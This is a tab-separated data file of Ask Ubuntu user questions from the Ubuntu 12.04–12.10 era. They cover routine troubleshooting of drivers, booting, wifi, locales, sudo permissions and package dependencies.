230438	ubuntu cloud uec 12.04 amd64 image has an invalid locale	following the tutorial in https : //help.ubuntu.com/community/uec/images # downloaduecimages i was able to execute the ubuntu 12.04 cloud image ( amd64 ) in my computer ( http : //cloud-images.ubuntu.com/precise/current/precise-server-cloudimg-amd64-disk1.img ) , so i can add whatever i want before uploading it to my openstack cloud . however , when i log in i receive a message saying that my environment specifies an invalid locale . in order to sort this out , i run locale-gen , obtaining the following : ubuntu @ ovfdemo : ~ $ sudo locale-gen sudo : unable to resolve host ovfdemo generating locales ... en_us.utf-8 ... /usr/sbin/locale-gen : line 243 : 1435 killed localedef $ no_archive -i $ input -c -f $ charset $ locale_alias $ locale failed generation complete . ubuntu @ ovfdemo : ~ $ locale -a locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_collate to default locale : no such file or directory c c.utf-8 posix ubuntu @ ovfdemo : ~ $ locale locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory lang=en_us.utf-8 language= lc_ctype= '' en_us.utf-8 '' lc_numeric= '' en_us.utf-8 '' lc_time= '' en_us.utf-8 '' lc_collate= '' en_us.utf-8 '' lc_monetary= '' en_us.utf-8 '' lc_messages= '' en_us.utf-8 '' lc_paper= '' en_us.utf-8 '' lc_name= '' en_us.utf-8 '' lc_address= '' en_us.utf-8 '' lc_telephone= '' en_us.utf-8 '' lc_measurement= '' en_us.utf-8 '' lc_identification= '' en_us.utf-8 '' lc_all= this does not happen in the i386 version of the same image ( http : //cloud-images.ubuntu.com/precise/current/precise-server-cloudimg-i386-disk1.img ) . what can i do to solve this problem ?
230439	how to make live dvd efi bootable ?	equipment : pre-loaded windows 8 laptop , needs multi-boot capability ( win8 + linux and bsd ) lots of usb 3.0 sticks and blank dvd-rs . various iso 's , including ubuntu secure-remix 12.10 problem : after burning aforementioned ubuntu iso to dvd ( or usb ) , the live disc does not boot in efi mode . booting into legacy mode installs for legacy mode . this makes windows not work without switching back and forth . requirements : a pre-loaded windows 8 machine that can boot a livedvd in efi mode , install ubuntu 12.10 64-bit in efi mode , and finish with a multi-boot capable machine . what is done already : iso 's downloaded . partition shrunk , leaving lots of room to play with , ubuntu installed in legacy mode . windows and ubuntu work but have to switch efi depending upon which is being used . what is n't done : anything with grub .
230440	how are problems with the unity launcher debugged ?	i easily added an intellij idea launcher icon , and locked it ( idea creates the .desktop file ) . using the .local/share/applications/jetbrains-idea.desktop as an example it was easy to add another locked launcher for the aventail connect vpn . all very simple , so i tried adding a launcher icon for aqua data studio ( ads ) . this is a java application launched by a bash script just like intellij idea is . if the ads application is picked from unity dash it starts fine , and a launcher icon appears . the problem is if this icon is pinned , and the icon is clicked on to start ads , the icon flashes for a second or two , and nothing happens . i turned `` terminal '' true hoping to see the reason for the failure to start , but the terminal does not even open . the other strange thing was when this icon was locked it immediately re-positioned itself to the top . this had not happened with idea or aventail . is there a way to turn on logging to see exactly what the launcher is doing , and where the failure is ? by trial and error i found the following solution , but the system would not allow me to answer myself -- do not provide a value for startupwmclass by guessing . i had set : startupwmclass=datastudio by leaving this key off the locked launcher works fine .
230444	desktop not displaying properly	i have installed # lubuntu 12:10 onto an older pentium 3 pc with 512mb ram and 20gb hd . i can not make out the desktop as it is not being displayed properly . the mouse leaves massive trails which obscure the background on top half of screen . the bottom half of screen is also obscured and the mouse will not go there . i can login to the shell with ctrl+alt+f1 and this displays ok . please can anyone help me resolve this ? this is my first time using any linux os and i want to recycle this old pc so i do n't have to chuck it . many thanks steve ( lubuntu newbie ) : - )
230445	unity doesnt shows correctly after proprietary nvidia even after linux-headers-generic	i just reinstalled ubuntu 12.10 and cant get nvidia proprietary drivers to work properly in the unity dash.. previously before formating i installed the linux-headers-generic tweak and it worked , but now even if i install it it stays messy ! ! someone help !
230446	can i totally discard optimus functionality and use the original website driver ?	i use geforce 630m . i do n't want to use bumblebee , because it is unstable for me . it will suddenly freeze my ubuntu 12.04 64 bits . how to do that ? thank you~
230447	how to add user from guest account/root ?	for some reasons i have deleted my user with his /home/ . and now i have guest account and root , for which i ca n't set password . and i need to add a new user . any ideas ? i am using ubuntu 12.10
230452	gnome shell has turned into gnome classic ( no effects ) after installing fglrx .	for some reason , i ca n't get gnome shell working after installing fglrx . when i select gnome shell in the profile , it just goes to gnome classic ( no effects ) . a few other issues : gdm has turned into something that looks a lot more fancy ( not sure what it is ) selecting system default in the profile section just gives me a blank screen ( not unity ) when i drag a window around i get laggy windows-esque shadows oh and i 'm on ubuntu 12.10 with an amd radeon hd 6540 g2 graphics card
230455	imac remove os and install ubuntu	i have a 2010 imac , that is now out of warranty . i was wondering if there was a way to completely remove the apple os and install a clean version of ubuntu , with no remaining apple os ( like you can do with windows machines ) ? i was looking for other posts that asked this question and could not find any , i am guessing it is because this is not possible , but i thought no harm in asking .
230457	sorry , ubuntu one has encountered and error and needs to close ?	while trying to install the ubuntu one client on windows 7 , every time i try to sign in , it replies with this error . in details , it says : zipimporterror bad local file header in c : \program files ( x86 ) \ubuntuone\dist\library.zip does anybody know what 's going on , or perhaps how to fix it ?
230458	dv1000 wireless dosent seem to work	the wireless driver on my hp dv1000 does not work on ubuntu 11.10. source dv1000 linux i need the drivers so that then i can update to the newest ubuntu it says firmware missing and i seriously dont know were to get it . for the wireless card i have a broadcom corportation bcm4306 802.11b/g wireless lan controller
230460	microsoft lifecam-vx700 v2.0 audio is just static	running ubuntu 12.04.1 lts 32-bit on a computer with an intel core i5 processor , 4gb ram and a nvidia 450gts graphics card . i am trying to set up skype with my webcam . so far everything works almost perfectly , however my microsoft lifecam-vx700 v2.0 audio does not work correctly . the audio feed is just static/white noise . i have checked the hardware using windows and it worked perfectly there . the video works great in ubuntu . it is just the audio that is the problem . what can i do to rectify this problem ?
230463	building small ubuntu server - what hardware is recommended ?	there are many of us who need to build small ubuntu server . problem is that in some countries it is hard to find and quite expensive to buy server motherboards and processors . and when one is building small server with limited budget , buying some xenons is not really an option . so , are there any general recommendations for hardware ( i think that motherboards are the main issue ) that is stable and fast under linux ? i read that intel should be the best choice for cpu + mbo combo . so , i was looking around for some intel motherboards + i7 ivy bridge ( like intel dz77bh-55k with z77 chipset and intel i7 3770k ) but i 've read that they have some issues with kernel , booting and usb ports . that is why i ask community if you have any experience with this . maybe intel is not the best choice here ? maybe asus or gigabyte or _other company_ are more stable with linux ? i hope that this q & as can help people in building stable ubuntu server .
230466	ubuntu 12.10 will not boot ! ! please help	okay ive been at this for about 6 hours now , linux has never given me problems before , im installing from an isodvd going from window7 to ubuntu12.10 , the installation works fine , everything loads perfect with no problems and it asks me to restart when the installation is comeplete . after the computer shuts down and i remove the livecd as it tried to boot up i get an error : no boot disk has been detected or the disk has failed . ive tried updating grub from the livecd because it is the only way i can boot to anything atm , nothing has worked so far . has anyone else had this problem ? ?
230469	wubi would not uninstalling	i installed wubi 12.04 with a username and password . it installed successfully but when i tried logging in , it said my password was incorrect . i then decided to uninstall but it kept giving me this error message : an error occurred : permission denied for more information , please see the log file : c : \users\optimus\appdata\local\temp\wubi-12.04-rev266.log how can i then uninstall wubi from my laptop ? kindly assist .
230470	toshiba satellite l855-14j and ubuntu 12.10	i have toshiba satellite l855 with intel i7 3630qm and amd 7670m . this version is called l855-14j here , in croatia . it also came with 4gb of ram and 750 gb hdd and 1366 x 768 led display . i had some problems when installing and making ubuntu 12.10 normal working environment : wired network did n't worked usb 3.0 did n't worked no intel hd graphic from i7 was present fglrx drivers had problems brightness could n't change
230473	only member of 1 group when using vmware console but member of many when using ssh	ubuntu 12.04.01 lts hosted by vmware when i use a terminal window in the console using vmware vsphere as myself , 'id ' only shows i 'm a member of the main group ( ie group in /etc/passwd ) . however , when i login remotely via ssh , 'id ' now shows all the groups of which i 'm a member . this is a problem as , on the console , i can no longer sudo as it now thinks i 'm not in the sudo group . if i login to the vmware console as the user that installed ubuntu , id correctly shows all the groups . i added myself to /etc/group , /etc/gshadow by editting them and i can see no difference between how i 'm set up in those files and how the ubuntu installer user is setup . what else do i need to fix so i can sudo from myself in the vmware console ? ( i have tried logging in again many times ) i 'm also a bit confused about what /etc/sudoers thinks is the admin group . /etc/group has adm , not admin , but sudoers has groups admin & sudo ( no adm ) . ( i have seen postings in ask ubuntu saying in 12.04 group admin has been replaced by group sudo - maybe it is not a problem ) thanks for any help
230474	dependency errors on installing banshee	i just installed ubuntu 12.10 ( verified the iso hash as well ) . the very first thing i did was open the software centre and try to install banshee . i am met with the following error : the following packages have unmet dependencies : banshee : depends : libc6 ( > = 2.7 ) but 2.15-0ubuntu20 is to be installed depends : libglib2.0-0 ( > = 2.34.1 ) but 2.34.0-1ubuntu1 is to be installed depends : libgtk2.0-0 ( > = 2.24.0 ) but 2.24.13-0ubuntu2 is to be installed depends : libsoup-gnome2.4-1 ( > = 2.27.4 ) but 2.40.0-0ubuntu1 is to be installed depends : libsoup2.4-1 ( > = 2.26.1 ) but 2.40.0-0ubuntu1 is to be installed depends : libx11-6 ( > = 2:1.4.99.1 ) but 2:1.5.0-1 is to be installed depends : mono-runtime ( > = 2.10.1 ) but 2.10.8.1-5ubuntu1 is to be installed depends : libc0.1 ( > = 2.15 ) but it is not going to be installed depends : libgconf2.0-cil ( > = 2.24.0 ) but 2.24.2-2 is to be installed depends : libgdk-pixbuf2.0-0 ( > = 2.26.4 ) but 2.26.4-0ubuntu1 is to be installed depends : libglib2.0-cil ( > = 2.12.10-1ubuntu1 ) but 2.12.10-4 is to be installed depends : libgtk2.0-cil ( > = 2.12.10-1ubuntu1 ) but 2.12.10-4 is to be installed depends : libmono-cairo4.0-cil ( > = 2.10.1 ) but 2.10.8.1-5ubuntu1 is to be installed depends : libmono-corlib4.0-cil ( > = 2.10.1 ) but 2.10.8.1-5ubuntu1 is to be installed depends : libmono-posix4.0-cil ( > = 2.10.1 ) but 2.10.8.1-5ubuntu1 is to be installed depends : libmono-system-core4.0-cil ( > = 2.10.3 ) but 2.10.8.1-5ubuntu1 is to be installed depends : libmono-system4.0-cil ( > = 2.10.7 ) but 2.10.8.1-5ubuntu1 is to be installed depends : gnome-icon-theme ( > = 2.16 ) but 3.6.0-0ubuntu2 is to be installed i should note that the banshee application appears three times when searching for it : http : //i.imgur.com/fjosb.png other applications install fine though . i installed the latest updates and still received the same error . i even tried reinstalling ubuntu , but the same thing happened .
230476	when using sudo with redirection , i get 'permission denied '	when using sudo to allow edits to files , i regularly get 'permission denied ' . for example , my mouse is jittery and sluggish , so i want to disable polling : sudo echo `` options drm_kms_helper poll=n '' > /etc/modprobe.d/local.conf i 'm prompted for a password , and then get : bash : /etc/modprobe.d/local.conf : permission denied so i tried to do a temporary change to disable polling by using : sudo echo n > /sys/module/drm_kms_helper/parameters/poll yet again the system responded with : bash : /sys/module/drm_kms_helper/parameters/poll : permission denied any ideas ?
230477	lag spikes on my website	i have a heavy traffic site that gets about +200 concurrent users and receives 4k+ uniques daily . my site seems to load slow for a few minutes and then fast for a few minutes and the pattern continues on . i am running ubuntu 10.04 lts 32bit . it uses nginx as the webserver and php-fpm . i also have apc installed . my site uses wordpress with caching plugin . this is what my top looks like http : //pastebin.com/jdulwaxm this is nginx conf http : //pastebin.com/gxhtw9dg this is php-fpm conf http : //pastebin.com/nwzncs3r this is mysql conf http : //pastebin.com/sxrt7jf9 can anyone help me optimize to make the site stable ? if you think my configurations are alright then do you think it 's the host 's side that is at fault for the instability ?
230479	netgear wnda3100 on ubuntu 12.04 ?	i have a desktop that has no wired internet connection and need this adapter to work . i want to use my wnda3100 on this desktop but when i plug it in it does n't work . the light lights up but thats it . it is on the supported list as plug in play but it 's not working .
230488	how i increase wubi install to 100 giga	i 'm at 30giga wubi installed . i want 100 giga . i 'm sure one of you smart dudes have the answer , because linux is where the really people are hanging out these days . yep , i 'm new to this . so please help .
230489	terminal does n't see windows filesystem until i open in home folder gui	i 'm currently dual-booting windows 7 and ubuntu . when i try to access my windows hd through the terminal i ca n't find it . however , i used the home folder application to see where those drives/folders were . and after i clicked into it in the home folder , i looked again at the same folder in the terminal and it appeared . is there a reason for this and how can i set it so i always can see those folders ?
230490	unable to launch byobu with custom windows.name file	apologies if the solution is obvious but i 'm stumped ! i want to launch byobu from within my gnome 3 desktop environment on 12.04 but it 's not working for me as yet . here 's what i have : created a windows list file ~/.byobu/windows.mrb then tried to launch byobu from within the gnome terminal with : $ byobu_windows=mrb byobu but it gives me the default windows list , not my windows list . i followed these instructions from the wiki : https : //help.ubuntu.com/community/byobu # window_sets here is a sanitised version of my windows.mrb file : screen -t local bash screen -t name1 ssh xxx @ xxx screen -t name2 ssh root @ xxx screen -t name3 bash appreciate the time and effort . cheers brendan
230494	how to run multiple distros using lvm	i 've seen quite a few posts around about running multiple distros but not sure they apply to using lvm ( and without windows ) . i 'm using a machine that 's about 3 years old . setup : intel core i7 2.8ghz 8gb ram 1tb sata hdd at this point , i 'd like to install 12.10 and mint 14 , leaving the option open to install additional distros down the road . i could be way off , but i 'm thinking about creating at least 2 primary /boot partitions ( 1 for 12.10 and 1 for mint ) and another partition for lvm leaving room for additional /boot partitions . then creating a vg and separate lvs for ubuntu 12.10 and linux mint 14 . i understand i can share partitions between the 2 installs , but i 'm only using this for testing and i have tons of space to play with . lvm seemed logical considering i may want to install and test additional distros . i guess i could share the /swap partition across the board without problems , right ? i 'm unclear about grub2 . how do i handle the bootloader situation ? install 12.10 and get it running then make changes to grub.cfg after installing mint ? and do i not install grub for mint or do i install it in a different location ? any guidance would be appreciated .
230496	screen resolution is too low with open source drivers on ubuntu 12.10	i 'm on an amd graphics card . when i use the open source xserver-xorg-video-radeon driver , gnome shell works fine but my screen resolution ca n't be set higher than 1024x768 . however , when i 'm on the closed source fglrx drivers , the screen resolution works fine , but gnome shell does n't ( it goes to gnome classic for some reason ) . does anyone know how i can either get gnome shell to work with fglrx , or how i can set my screen resolution with xserver-xorg-video-radeon ?
230498	python-plugin installation	i try to play online radio in the chrome web browser . it said this following installation : required plugin could not be found python ( 2.7 ) requires to install plugins to play media files of the following type : text/html decoder how should i install it ?
230501	unable to instal ubuntu ( dualboot ) on my laptop	i am facing very serious issue with my laptop : hp pavilion g4 - intel i5 , 2450m 250ghz . i am unable to install ubuntu on my laptop , i tried installing using cd or using wubi . it loads up and shows black screen . other linux versions like suse and fedora are not working as well . only one version worked crunchbang . windows 7 and windows 8 work fine . thanks in advance .
230512	no sound in ubuntu 12.10 [ or any distro ] , mb soundcard	integrated motherboard sound card . one day sound stopped working . no boot sound , no nothing . laptop 's microphone works . installed 4 different distributions , including debian , yet no boot sound - nothing . help .
230519	how can i remove one of the two mate panels without using the gui ?	on a default installation mate sets up two panels ( top and bottom ) , i 'd like to have the top panel removed using mateconftool-2 or another tool using the command line ( terminal ) . i ca n't find how to do this though ( from the terminal ) , so i tried deleting the directory in ~/.mateconf/apps/panel/toplevels/ and restarting the panel but it does nothing and so the panel is still there . how can i remove one of the panels not using the gui ?
230520	forget my keyring password kde	every network related application ask my keyring password . but i am totally fool person who forgeted it . : ( please help me . i ca n't read mail , could n't access in firefox etc .
230521	why does qt-creator need to connect to google-analytics ?	i just installed qt-creator to work on non-qt c++ projects . the installed version is 2.5.0 ( based on qt 4.8.2 32-bit ) if i click on any of these pages : i get this error : i realized that /etc/hosts file has the following entry : 127.0.0.1 www.google-analytics.com i do n't want to remove the entry from the hosts file because it 's always been there along with thousands of other similar adservices/porn/malware addresses . i do not intend to say that qt-creator is looking to create problems in my computer , but i am genuinely interested to know why qt-creator needs to connect to google-analytics ? can this be disabled and qt-creator can still be functional ?
230523	ubuntu software center hanging	i have been using ubuntu 12.04 for last 4 months . it was working properly but suddenly the ubuntu software center has started hanging.now it does n't open . and every time i try to open it , i have to force quit it . so that i am not able to install the software that i need.i am in a great problem ... what do i do ? please help me ...
230525	raid 5 reassemble stating wrong homehost ?	so i went from a degraded raid , to a dissasembled raid , to now trying to reassemble it . im getting a weird message when trying to -- assemble the raid . i have 6 drives , so /dev/sd [ a-f ] 1 . when trying to assemble the raid , i am getting that e and f are misses out due to wrong homehost . i tried to search around but i cant find the correct solution to get the raid 5 going again .
230527	update manager got stuck ( but not frozen ) while installing downloaded updates . what should i do ?	i have just gotten my ubuntu 12.04 lts desktop computer reassembled after a trip back home and connected it to my parent 's wireless internet connection . the connection seems quite shaky ( disconnects half the time , likely an ongoing issue with the wireless card i have installed ) , and it struggled to download updates because of the constant interruptions . eventually , it managed to download the updated packages and started installing them . i got up and left it to do its work . when i came back , i saw it was still having trouble staying connected to the wireless ( no surprise there ) , but then i noticed that it seemed like update manager had stopped making progress on the installation . i opened the details pane to see what it was last doing : my guess was that the installation script for flashplugin-installer could n't complete the download until i stabilized the internet connection . i hooked my ubuntu laptop up to my desktop via ethernet and shared its wireless connection using this guide , and as i am typing this now from my desktop you can see that the connection issue was successfully worked around . however , even with a stable connection established , update manager seems `` stuck '' at its current position and wo n't go any further . it 's not totally frozen , but i ca n't do anything beyond open/close the details pane as the cancel button is grayed out . i know it can cause big problems if updates are stopped during installation , but i 'm at a loss as to how this situation should be handled . i 'm sure it should finish normally if i can just find a way to restart update manager , but the question is how this should be approached . how can i safely get my updates to finish installing ?
230528	migrating to full ubuntu after dual installation on winxp	i previously ran 12.04 alongside winxp to see how it performed on my mom 's older laptop . i also migrated her email to thunderbird . if i now convert from dual winxp/ubuntu to only run ubuntu will things like her thunderbird emails be transferred as part of the ubuntu full install ? or must i do something else ? i am fairly tech aware , but not a full it boffin !
230529	team viewer 8 beta wont run	i installed team viewer 7 and then one of my friends using windows got version 8 so i installed the beta of version 8 for linux . when i try to run it for terminal i get these errors i atempted to do as the comment bellow said and when trying to run teamveiwer i stil got an error conner @ demonicgrace : ~ $ teamviewer init ... checking setup ... launching teamviewer ... wine : can not find l '' c : \windows\system32\winemenubuilder.exe '' err : wineboot : processrunkeys error running cmd l '' c : \windows\system32\winemenubuilder.exe -a -r '' ( 2 ) err : winedevice : servicemain driver l '' mountmgr '' failed to load err : secur32 : secur32_initschannelsp libgnutls not found , ssl connections will fail fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 fixme : ole : coinitializesecurity ( ( nil ) , -1 , ( nil ) , ( nil ) ,0,3 , ( nil ) ,0 , ( nil ) ) - stub ! fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 fixme : process : setprocessshutdownparameters ( 00000100 , 00000000 ) : partial stub . fixme : resource : getguiresources ( 0xffffffff,0 ) : stub fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x32df64,0x00000000 ) , stub ! fixme : win : enumdisplaydevicesw ( l '' \\.\display1 '' ,0,0x32dc1c,0x00000000 ) , stub ! fixme : win : enumdisplaydevicesw ( ( null ) ,1,0x32df64,0x00000000 ) , stub ! please help me out if anyone has ideas im more than willing to listen
230530	ubuntu one files for android crashes on start when wifi is not turned on	i installed ubuntu one files ( version 1.2.5 ) on android 4.0.4 ics . i set the option `` use both wifi and gprs connections '' , but it crashes when wifi is not turned on . with wifi connection it works fine . on android 2.1 app works fine on both wifi and gprs connections . how can i fix the problem ? thanks !
230531	intel fortran error # 10001	i have a problem with the intel fortran compiler . it has been working fine in 8.04 and 10.04 lts ( well , some changes required during the installation due to the fact that 10.04 uses dash and not bash as the shell /bin/sh ) now i have upgraded to 12.04 and when compiling i get the following message : ifort : error # 10001 : could not find directory in which g++ resides is there anybody that knows how to solve this problem ?
230535	what 's changing the owner on my log files ?	i have several log files in /var/log/mythtv that need to be owned by mythtv.users . in versions of ubuntu prior to 12.10 if i did : sudo chown mythtv.users mylogfile that worked fine and my log files would stay belonging to mythtv.users . however , since upgrading to 12.10 ubuntu keeps changing the ownership of my log files back to syslog.adm . is there any way to stop ubuntu changing the ownership of my log files ?
230545	isy wlan usb-adapter iwl 1000 n150 not recognized	2 weeks ago , i installed ubuntu 12.10 on my pc . everything is fine except from my wireless usb adapter . i have a isy wlan usb-adapter iwl 1000 n150 . i tried several ways to make it work but nothing . probably i need a firmware - driver because it is not recognized from the operating system . does anyone know how can i install drivers for this network adapter ? this is the first time working with ubuntu for me , so i need a little bit of help . thanks .
230548	how do i upgrade my windows 7 install to windows 8 while booting from ubuntu live usb ?	my windows 7 install recently broke , and instead of reinstalling i decided i might as well upgrade it to windows 8 . to save money , i got the cheaper downloadable version of the windows 8 installer and chose to put it on a usb . unfortunately , when i tried to upgrade windows 8 by booting directly from the usb , it told me that i need to boot into windows 7 first and then mount the usb to upgrade , which i ca n't do because my windows 7 is n't working . i could do a fresh install , but i 'm trying to avoid that so i can keep my applications . i 've been using an ubuntu live usb while i 've been figuring out what to do about all this , and i 'm not sure if i can run the windows 8 installer somehow through ubuntu and upgrade my windows 7 install without having to be booted into it first . any thoughts ?
230551	system in low graphics , deleted linux , grub rescue , ca n't access windows	so i 'm pretty new to ubuntu but i managed to install it with no big problems on both my desktop and netbook . when i installed it on my brother 's netbook everything went horribly wrong and now i fear the system is close to beyond repair . the problem was first that it said it did not have any space left ( seemed ridiculous since it had a lot ) . then ubuntu began booting into a `` system is running in low graphics mode error '' which i then tried to fix , using all the tips i could find in here but nothing helped . i think the graphics error and lack of space might have been related but i ca n't be sure . finally i gave up repairing ubuntu and went for a reinstall . should n't have done that ! i read that i should simply open ubuntu through a live usb and choose gparted to delete the linux partitions so i did and rebooted accordingly . next , i was to install ubuntu but now i am only given the option to wipe the whole disk for ubuntu , not install along with windows 7 . if i access gparted i can still see the ntfs partitions that hold windows 7 ( there are 2 : one labeled recovery and another labeled os and boot ) so why ca n't i access them ? btw . the os and boot has a little red mark with a warning that 1 cluster is referenced to multiple times , do n't know what that means . if i boot without the live usb i am sent directly into a grub rescue `` black screen of the computer will follow no orders '' . please , i know that the easiest might be to simply wipe the whole thing clean but there are important files and programs on windows 7 . is there a way to just access windows ? it is a dell inspiron 1018 mini netbook , so i have no cd input and no windows 7 installation cd .
230553	how to prevent so many instances of apt-check running ?	i have an ubuntu 12.04 server that just crashed because of a very obvious cause : 30+ of apt-check processes consuming all memory , the oom killer kicking in , killing vital services . i 'm not sure where the apt-check processes come from , but i guess my nagios/icinga plugins check_apt might use it , as well as the byobu status line may want to display its output . i guess something locked up and all of the processes were just waiting , yet holding memory . how can i prevent to have so many instances of apt-check on the system ? it does n't make sense to me and it should just quit as soon as it ca n't get a read lock on the dpkg database . it seems that i 'm not the only one running into trouble here . all suggestions for apt-check are pretty negative : ( clean browser , not logged in , no personalised search )
230555	what causes “pam_unix … conversation failed” in auth.log	there are thousands of entries in my auth.log like this : sudo : pam_unix ( sudo : auth ) : conversation failed what causes these to occur ? i 'd like to fix whatever it is but i 'm a bit mystified as to where to look . visudo looks ok to me but i 'm no expert at it 's syntax .
230556	why wo n't my broadcom bcm4312 lp-phy work with the sta driver ?	i tried the steps here for a 4312 : https : //help.ubuntu.com/community/wifidocs/driver/bcm43xx both of these : sudo modprobe -r b43 ssb wl sudo modprobe wl return : fatal : module wl not found . fatal : error running install command for wl ( this one is only for the second one actually ) i tried the broadcom-sta , did n't work . what 's confusing is down below in the next steps for sta with internet access it says to use the bcmwl one . so i install that and it succeeds but with some errors : sudo apt-get install bcmwl-kernel-source reading package lists ... done building dependency tree reading state information ... done the following package was automatically installed and is no longer required : module-assistant use 'apt-get autoremove ' to remove it . the following new packages will be installed : bcmwl-kernel-source 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/1,181 kb of archives . after this operation , 3,609 kb of additional disk space will be used . selecting previously unselected package bcmwl-kernel-source . ( reading database ... 168005 files and directories currently installed . ) unpacking bcmwl-kernel-source ( from ... /bcmwl-kernel-source_5.100.82.112+bdcom-0ubuntu3_amd64.deb ) ... setting up bcmwl-kernel-source ( 5.100.82.112+bdcom-0ubuntu3 ) ... loading new bcmwl-5.100.82.112+bdcom dkms files ... building only for 3.5.0-21-generic building for architecture x86_64 module build for the currently running kernel was skipped since the kernel source for this kernel does not seem to be installed . error : module b43 does not exist in /proc/modules error : module b43legacy does not exist in /proc/modules error : module ssb does not exist in /proc/modules error : module bcm43xx does not exist in /proc/modules error : module brcm80211 does not exist in /proc/modules error : module brcmfmac does not exist in /proc/modules error : module brcmsmac does not exist in /proc/modules error : module bcma does not exist in /proc/modules fatal : module wl not found . fatal : error running install command for wl update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.5.0-21-generic jtaylor991 @ jtaylor991-whitehp : ~ $ sudo modprobe wl fatal : module wl not found . fatal : error running install command for wl then i do the modprobe wl commands listed above and it gives the above listed errors . it did n't work with the broadcom-sta driver either . i installed the b43 ones but nothing happened , and i do n't know why so those are still installed . firmware-b43legacy-installer , b43-fwcutter and firmware-b43-lpphy-installer ( yes it is a lp-phy ) are currently installed . if i go into system settings > software sources > additional drivers it says `` using broadcom 802.11 linux sta wireless driver source from bcmwl-kernel-source ( proprietary ) but bcmwl-kernel-source is n't installed . i could try again but i remember rebooting and it still said this . what 's funny is it found wireless networks during the ubuntu setup/installation , i do n't remember if i got it to connect or not though . i think it kept asking for a password when i put it in ( yes it was right i showed password and looked at it ) so i just ignored it . but right now the enable wireless option in the top right is just gone , it 's just enable networking and i 'm on ethernet on this hp pavilion dv4-1435dx right here . if i run rfkill list it shows : 0 : hp-wifi : wireless lan soft blocked : no hard blocked : no it was hard blocked at the beginning but unblocking it makes no change . also it 's a touch sensitive button , and it appears to be always orange no matter if it 's enabled or not because when i touch it the hard blocked changes between yes and no in rfkill list . i think it was blue for a minute at one point . what is going on ? ! ? ! help me ! lol , thanks for any and all of your time guys . oh yeah this is ubuntu 12.10 fresh install .
230563	non functioning touchpad and mouse in a samsung notebook on ubuntu 12.10	the below command works only during the session , after reboot or swtich off/on it does n't work . how can i make this command remain . modprobe -r psmouse modprobe psmouse proto=imps
230564	which libappmenu.so must i edit under gtk 3.0 to remove eclipse from the hud blacklist ?	under gtk 2.10.0 one could allow hud for eclipse by replacing eclipse with xclipse in : /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so after doing an update , this file dissapeared from the gtk 2.10 and now i 'm guessing i should do the same edit in : /usr/lib/gtk-3.0/3.0.0/menuproxies/libappmenu.so only problem is that there is no such file . i did find a similarly named file : /usr/lib/indicators/7/libappmenu.so but do n't know if that is the right place to mess with it . if anyone has an updated answer for enabling the heads up display ( cool menu at the top ) for eclipse under the latest ubuntu 12.10 will you kindly share it ?
230565	samba gui not opening	running 12.04 on 2 pcs both dell and a compaq with xp . i want to config the system so one dell is the server and the others clients , try to open the gui and nothing after entering password . have glade installed and glade2 .
230566	what does this fix for non-responsive mouse and keyboard do ?	i 'm using ubuntu 12.10 and found that after about 20 minutes of work that my mouse and keyboard became very unresponsive . so i found the following fix ( logging in as root - careful ! ! ! ) : sudo -i to test if this is the problem : echo n > /sys/module/drm_kms_helper/parameters/poll to make the fix permanent : echo `` options drm_kms_helper poll=n '' > /etc/modprobe.d/local.conf it appears that the fix does work , but what does this do ? am i breaking something else in doing this ? i do n't like changing default settings without knowing what it 's doing , so i just want to find out what this does , and if it may have any adverse side-effects .
230568	how to make a permanent configuration to eth1	i need to configure eth1 with : ip address : 10.5.15.200 ; netmask : 255.255.255.128 ; mac address : a2 : bb : cc : dd:5:15 ; gateway : 10.5.15.129 . mac address must be set up before eth1 is up . i must use pre-up but i do n't know .
230572	ubuntu 12.04.1 lts -touch pad scroll for asus-k55v not working	have tried all the commands over terminal but still could not fix it . for xinput i got virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ mosart semi . 2.4g keyboard mouse id=11 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=15 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ mosart semi . 2.4g keyboard mouse id=10 [ slave keyboard ( 3 ) ] ↳ usb 2.0 uvc hd webcam id=12 [ slave keyboard ( 3 ) ] ↳ asus wmi hotkeys id=13 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=14 [ slave keyboard ( 3 ) ] none of the post could help to fix it : (
230574	ubuntu is not booting , after dual boot installation with windows 7	recently i bought a lenovo u410 ultrabook . it has given along with windows 7 and 4 primary partitions . so to install ubuntu 12.04 i removed one of the primary partition and made it as extended partition . in that extended partition , i allocated memory for the swap and root ( / ) directory and then installed the ubuntu . after that by using easybcd tool , added ubuntu to the boot menu in grub2 . so when i try to boot into ubuntu it is showing grub > prompt only . from there how can i boot into ubuntu . thanks in advance
230576	no wireless detected for atheros ar8162	i have a dell inspiron 14r 5420 and after installing ubuntu 12.10 the atheros ar8162 wireless ca n't be detected . i 'm very new to ubuntu .
230577	bluetooth is not working in ubuntu 12.10	i have a sony vaio vpceh35en and yesterday i installed ubuntu 12.10 . bluetooth is not working , can anyone help me please ?
230578	how to prevent ubuntu from connecting to wifi hotspots automatically	note : this question is distinct from `` how to disable automatically connecting to wifi ? `` , as i do not wish to disable automatic wifi connection in general . problem : the ubuntu wifi module connects automatically in priority with wifi networks without a password , even if there is a already known password-protected wifi network nearby . worse , most of the times these `` unprotected '' networks are in fact hotspots that require authentification from the browser . example : i am at home , and most of the times my ubuntu laptop will connect by itself to a nearby hotspot instead of choosing my local adsl box ( password-protected , with a password that is already known by the computer ) . i then have to select my own wifi network manually . is there a way to disable automatic connection to /all/ hotspots ?
